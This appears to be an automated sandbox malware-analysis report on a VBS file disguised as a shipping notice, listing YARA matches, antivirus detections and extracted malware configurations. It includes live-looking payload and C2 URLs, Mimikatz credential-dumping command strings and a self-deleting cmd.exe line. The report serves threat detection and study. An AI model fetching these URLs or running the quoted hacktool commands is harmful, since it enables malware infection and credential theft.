38.3.MpSigStub.exe.138be22418a.26.unpack	HackTool_MSIL_SharpHound_3	The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project.	FireEye	0x477d0:$typelibguid1: a517a8de-5834-411d-abda-2d0e1766539c
38.3.MpSigStub.exe.138be22418a.26.unpack	HKTL_NET_GUID_CsharpAmsiBypass	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x185087:$typelibguid0: 4ab3b95d-373c-4197-8ee3-fe0fa66ca122
38.3.MpSigStub.exe.138be22418a.26.unpack	HKTL_NET_GUID_SharpHound3	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x477d0:$typelibguid0: a517a8de-5834-411d-abda-2d0e1766539c
38.3.MpSigStub.exe.138be22418a.26.unpack	ROKRAT_Nov17_1	Detects ROKRAT malware	Florian Roth	0x48de16:$s1: \T+M\Result\DocPrint.pdb
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_cerber	Yara detected Cerber ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Buran	Yara detected Buran Ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Vidar	Yara detected Vidar stealer	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_gogoogle	Yara detected GoGoogle ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Codoso_Ghost	Yara detected Codoso Ghost	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Hancitor	Yara detected Hancitor	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Voidcrypt	Yara detected Voidcrypt Ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_ByteLocker	Yara detected ByteLocker Ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Mailto	Yara detected Mailto ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_MiniRAT	Yara detected Mini RAT	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Clop	Yara detected Clop Ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_NoCry	Yara detected NoCry Ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Artemon	Yara detected Artemon Ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Nemty	Yara detected Nemty Ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_CryLock	Yara detected CryLock ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Gocoder_3	Yara detected Gocoder ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Shellcode_Injector	Yara detected generic Shellcode Injector	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_lazparking	Yara detected LazParking Ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Jigsaw	Yara detected Jigsaw	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Cobra_Locker	Yara detected Cobra Locker ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_PasteDownloader	Yara detected PasteDownloader	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_hidden_tear	Yara detected HiddenTear ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	malware_red_leaves_memory	Red Leaves C&C left in memory, use with Volatility / Rekall	David Cannings	0x3feedf:$: OnlineTime= 0x3fef1d:$: clientpath= 0x3fef2c:$: serverpath=
38.3.MpSigStub.exe.138be22418a.26.unpack	gh0st	unknown	https://github.com/jackcr/	0x11a6e5:$b: Gh0st Update
38.3.MpSigStub.exe.138be22418a.26.unpack	NetWiredRC_B	NetWiredRC	Jean-Philippe Teissier / @Jipe_	0xe4f5b:$str4: [%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d] 0xbf154:$str5: %.2d/%.2d/%d %.2d:%.2d:%.2d 0xe4f63:$str5: %.2d/%.2d/%d %.2d:%.2d:%.2d 0x42fa9d:$klg8: [Home] 0x42fa87:$klg10: [Page Down] 0x42fa95:$klg11: [End] 0x1848b8:$klg15: [Print Screen] 0x3f0e1c:$klg15: [Print Screen]
38.3.MpSigStub.exe.138be4ca38f.133.unpack	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0x1d687a:$xs1: WS2_32.dll 0x457325:$xs2: ReflectiveLoader
38.3.MpSigStub.exe.138be4ca38f.133.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0x457325:$x1: ReflectiveLoader
38.3.MpSigStub.exe.138be4ca38f.133.unpack	REDLEAVES_DroppedFile_ImplantLoader_Starburn	Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT	USG	0x1550a7:$XOR_Loop: 32 0C 3A 83 C2 02 88 0E 83 FA 08 7C 90 01 01 EB 90 01 01 BA 08 00 00 00 32 0C 3A 83 C2 02 88 0E 83 FA 10
38.3.MpSigStub.exe.138be4ca38f.133.unpack	APT_PupyRAT_PY	Detects Pupy RAT	Florian Roth	0x30cb0e:$x1: reflective_inject_dll
38.3.MpSigStub.exe.138be4ca38f.133.unpack	SUSP_Script_Obfuscation_Char_Concat	Detects strings found in sample from CN group repo leak in October 2018	Florian Roth	0x38cfd0:$s1: "c" & "r" & "i" & "p" & "t"
38.3.MpSigStub.exe.138be4ca38f.133.unpack	SUSP_PDB_Path_Keywords	Detects suspicious PDB paths	Florian Roth	0x2fa566:$: Release\Shellcode 0x2fa56e:$: Shellcode.pdb
38.3.MpSigStub.exe.138be4ca38f.133.unpack	IMPLANT_4_v5	BlackEnergy / Voodoo Bear Implant by APT28	US CERT	0x139ce3:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0x139d3e:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0x13a08a:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0x13a0e5:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0x13c38c:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1
38.3.MpSigStub.exe.138be4ca38f.133.unpack	IMPLANT_5_v3	XTunnel Implant by APT28	US CERT	0x15283d:$BYTES1: 0F AF C0 69 C0 07 00 00 00 2D 01 00 00 00 0F AF C9 39 C8 0x15285f:$BYTES1: 0F AF C0 69 C0 07 00 00 00 2D 01 00 00 00 0F AF C9 39 C8
38.3.MpSigStub.exe.138be4ca38f.133.unpack	MAL_AirdViper_Sample_Apr18_1	Detects Arid Viper malware sample	Florian Roth	0x2ff0ba:$x1: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del "%s" 0x2ff154:$x2: daenerys=%s& 0x2ff160:$x3: betriebssystem=%s&anwendung=%s&AV=%s 0x2ff136:$s1: Taskkill /IM %s /F & %s
38.3.MpSigStub.exe.138be4ca38f.133.unpack	HKTL_NET_NAME_AmsiBypass	Detects .NET red/black-team tools via name	Arnim Rupp	0x3ba191:$name: AmsiBypass 0x16fd8b:$compile: AssemblyTitle
38.3.MpSigStub.exe.138be4ca38f.133.unpack	Pupy_Backdoor	Detects Pupy backdoor	Florian Roth	0x30cb0e:$x4: reflective_inject_dll 0x30cb0e:$x8: reflective_inject_dll 0x30cb0e:$x9: reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits)
38.3.MpSigStub.exe.138be4ca38f.133.unpack	TA17_293A_malware_1	inveigh pen testing tools & related artifacts	US-CERT Code Analysis Team (modified by Florian Roth)	0xa01be:$n1: file:// 0xba788:$n1: file:// 0x1783d5:$n1: file:// 0x2ac008:$n1: file:// 0xbac20:$ax2: 5.153.58.45
38.3.MpSigStub.exe.138be4ca38f.133.unpack	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x2ee41:$s2: sekurlsa::wdigest 0x2ed72:$s6: sekurlsa::livessp 0x2edb7:$s9: sekurlsa::process 0x2edfc:$s12: sekurlsa::tickets 0x2ed2d:$s15: sekurlsa::credman
38.3.MpSigStub.exe.138be4ca38f.133.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x2004b0:$x1: sekurlsa::logonpasswords
38.3.MpSigStub.exe.138be4ca38f.133.unpack	CredTheft_MSIL_ADPassHunt_2	unknown	FireEye	0x2c72e7:$pdb1: \ADPassHunt\ 0x2c72f8:$pdb2: \ADPassHunt.pdb 0x2c730c:$s1: Usage: .\ADPassHunt.exe 0x2c7328:$s2: [ADA] Searching for accounts with msSFU30Password attribute 0x2c7368:$s3: [ADA] Searching for accounts with userpassword attribute 0x2c73a5:$s4: [GPP] Searching for passwords now
38.3.MpSigStub.exe.138be4ca38f.133.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x311808:$r1: teSlortnoCtnerruC 0x3f3342:$r1: teSlortnoCtnerruC
38.3.MpSigStub.exe.138be4ca38f.133.unpack	ROKRAT_Nov17_1	Detects ROKRAT malware	Florian Roth	0x1e7c11:$s1: \T+M\Result\DocPrint.pdb
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_cerber	Yara detected Cerber ransomware	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_Buran	Yara detected Buran Ransomware	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_gogoogle	Yara detected GoGoogle ransomware	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_Hancitor	Yara detected Hancitor	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_Voidcrypt	Yara detected Voidcrypt Ransomware	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_Mailto	Yara detected Mailto ransomware	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_MegaCortex	Yara detected MegaCortex Ransomware	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_NoCry	Yara detected NoCry Ransomware	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_Nemty	Yara detected Nemty Ransomware	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_CryLock	Yara detected CryLock ransomware	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_Marvel	Yara detected Marvel Ransomware	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_Gocoder_3	Yara detected Gocoder ransomware	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_Shellcode_Injector	Yara detected generic Shellcode Injector	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_hidden_tear	Yara detected HiddenTear ransomware	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	malware_red_leaves_memory	Red Leaves C&C left in memory, use with Volatility / Rekall	David Cannings	0x158cda:$: OnlineTime= 0x158d18:$: clientpath= 0x158d27:$: serverpath=
38.3.MpSigStub.exe.138be4ca38f.133.unpack	PoisonIvy_3	unknown	Kevin Breen <kevin@techanarchy.net>	0x208b96:$string1: CONNECT %s:%i HTTP/1.0 0x25b573:$string1: CONNECT %s:%i HTTP/1.0 0x25b5c8:$string2: ws2_32 0x25b602:$string3: cks=u 0x208c58:$string4: thj@h 0x25b4d0:$regvalue1: SOFTWARE\Classes\http\shell\open\command 0x24baf6:$regvalue2: Software\Microsoft\Active Setup\Installed Components\
Click to see the 449 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc

Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp	Malware Configuration Extractor: GuLoader {"Payload URL": "http://178.32.63.50/mvbs/Host_hKVPgVgQ234.bin"}
Source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	Malware Configuration Extractor: Metasploit {"Type": "Execute Command", "Command": "\u0001"}
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack	Malware Configuration Extractor: Pony {"C2 list": ["http://download.enet.com.cn/search.php?keyword=%s", "http://www.colegioarbitrosargentinos.com.ar/img/overdue-account/invoice-053541/", "http://ow.ly/QoHbJ", "http://santasalete.sp.gov.br/jss/", "http://www.redirserver.com/update4.cfm?tid=&cn_id=", "http://194.5.249.107/2nquxqz2ok4a45l.php", "http://www.youndoo.com/?z=", "http://%s%simg.jpg", "http://sonharvaleapena.com.br/en_us/copy_invoice/25680423862/dqzln-cwhrf_yagnf-spn", "http://vod.7ibt.com/index.php?url=", "http://microhelptech.com/gotoassist/", "http://malikberry.com/files101/htamandela.hta", "http://%domain%/update.php", "http://d.sogou.com/music.so?query=%s", "http://%s:%d/%s%d%08d", "http://%s:%i%s?mod=cmd", "http://pages", "http://www.zxboy.com#http://", "http://p.zhongsou.com/p?w=%s", "http://88888888.7766.org/ExeIni", "http://update.7h4uk.com:443/antivirus.php", "http://23.95.122.25/..-.-................-.....-------------/..............................................................................................dot\"targetmode=\"external\"/></relationships>", "http://flash.chinaren.com/ip/ip.php", "http://jump.qq.com/clienturl_15", "http://dialup.carpediem.fr/perl/countdialupinter.pl?", "http://www.piram.com.br/hosts.txt", "http://www.now.cn/?SCPMCID=", "http://110.42.4.180:", "http://club.book.sina.com.cn/booksearch/booksearch.php?kw=%s", "http://%76%2E%79%61%6F%36%33%2E%63%6F%6D/url.asp", "http://ajeyftrjqeashgda.mobi/mSsQDIMIQ/inIDw/", "http://www.cashon.co.kr/app/app.php?url=", "http://stats.hosting24.com/count.php", "http://192.189.25.17/cgbin/ukbros", "http://pig.zhongsou.com/helpsimple/help.htm", "http://zsxz.zhongsou.com/route/", "http://whatami.us.to/tc", "http://whenyouplaygood.com/s/gate.php?a\");f[\"\\x73\\x65\\x6e\\x64\"]();eval(f[\"responsetext\"", "http://23.249.163.163/qwerty.exe", "http://92.222.7.", "http://darkside", "http://so1.5k5.net/interface?action=install&p=", "http://www.gamedanji.cn/ExeIni", "http://gosgd.com", "http://find.verycd.com/folders?cat=movie&kw=%s", "http://search.dangdang.com/dangdang.dll?mode=1020&catalog=100&key1=%s", "http://216.172.172.40/~agora546/cardoso/dilma.zip", "http://www.cashon.co.kr/app/uninstall.php?", "http://www.moliv.com.br/stat/email0702/", "http://foo.w97.cn/data/file/kwbuf.ini", "http://chemgioaz.blogspot.com/ ", "http://init.icloud-analysis.com", "http://img.zhongsou.com/i?w=%s", "http://new.beahh.com/startup.php", "http://pznjaslo.pl/wp-content/outstanding-invoices/", "http://instamailserver.link/finito.ps1", "http://www.enquesta.tempsdoci.com/tracking-number-7fjs84476372436909/mar-13-18-04-02-56", "http://mp3.baidu.com/m?tn=baidump3lyric&ct=", "http://3dplayful.blogspot.com/ ", "http://stroyprivoz.ru/dokumente-vom-notar/", "http://a.pomf.cat/", "http://hotedeals.co.uk/ekck095032/", "http://www.iask.com/s?k=%s", "http://vidquick.info/cgi/", "http://gg", "http://speedmasterprinters.co.za/erroreng/erroreng/erroreng/erroreng/ii.php", "http://search.newhua.com/search.asp?Keyword=%s", "http://(www\|corail
Source: MpSigStub.exe.4180.38.memstrmin	Malware Configuration Extractor: CryLock {"Extensions": "%d str_charcodeat DosDateTimeToFileTime() failed, err = %d str_tolowercase String.prototype.toLowerCase() is not a constructor const pea_calls_unimplemented_api Intel(R) Core(TM)2 CPU T7200 @ 2.00GHz(MSI Stream %d)(Ole Stream %d)0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz._SSF:ScanAllStreamselement.getElementsByTagName() called on non-DOM objectcryptoMpCommon(Message.%zu: %hs - %hs)(Message.%zu)No subject%lld"}

Yara detected Arcane Stealer

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Predator

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected RevengeRAT

Show sources

Source: Yara match	File source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Pony

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Baldr

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Multi AV Scanner detection for submitted file

Show sources

Source: Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs

ReversingLabs: Detection: 13%

Yara detected Njrat

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18300303304.00000138BE24D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18301189769.00000138BE6F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Multi AV Scanner detection for domain / URL

Show sources

Source: http://www.bonusesfound.ml/update/index.php	Virustotal: Detection: 13%			Perma Link
Source: http://110.42.4.180:	Virustotal: Detection: 13%			Perma Link

Source: 38.3.MpSigStub.exe.138be1deebe.25.unpack	Avira: Label: JS/Redirector.FX
Source: 38.3.MpSigStub.exe.138bcce283a.74.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 38.3.MpSigStub.exe.138bcce32d4.72.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 38.3.MpSigStub.exe.138bcce283a.167.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 38.3.MpSigStub.exe.138be1deebe.15.unpack	Avira: Label: JS/Redirector.FX
Source: 38.3.MpSigStub.exe.138be26cad6.50.unpack	Avira: Label: TR/Patched.Ren.Gen2
Source: 38.3.MpSigStub.exe.138bde736d2.82.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 38.3.MpSigStub.exe.138bcce32d4.166.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 38.3.MpSigStub.exe.138bcce2d87.168.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 38.3.MpSigStub.exe.138bcce2d87.73.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Location Tracking:

Yara detected Hancitor

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe

Code function: 45_2_00007FF7B582C1C4 CreateDirectoryW,FreeLibrary,DecryptFileW,FreeLibrary,FreeLibrary,

45_2_00007FF7B582C1C4

Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCg

Exploits:

Yara detected UACMe UAC Bypass tool

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138bde736d2.82.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Privilege Escalation:

Detected Hacktool Mimikatz

Show sources

Source: MpSigStub.exe, 00000026.00000003.18332668729.00000138BD2B0000.00000004.00000001.sdmp

String found in binary or memory: blog.gentilkiwi.com/mimikatz

Bitcoin Miner:

Yara detected Xmrig cryptocurrency miner

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be1461b6.106.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bdac8e06.63.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bccd231a.71.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bdd69a05.92.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be2a02c1.51.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be8f860a.191.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be8fa80e.190.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcdb95a6.204.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bccd231a.165.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bdd690b1.91.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd51435e.70.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcdbabaa.205.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce283a.74.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be8f860a.87.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be1459b2.104.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bdac8e06.213.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bdd687dd.93.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be2939bd.52.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bdac8e06.95.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcd0731e.140.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce283a.167.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce32d4.72.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be8fa80e.86.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be1451ae.105.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce2d87.168.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce32d4.166.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce2d87.73.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18291167151.00000138BE1C8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18338726635.00000138BCF14000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18354456744.00000138BD776000.00000004.00000001.sdmp, type: MEMORY
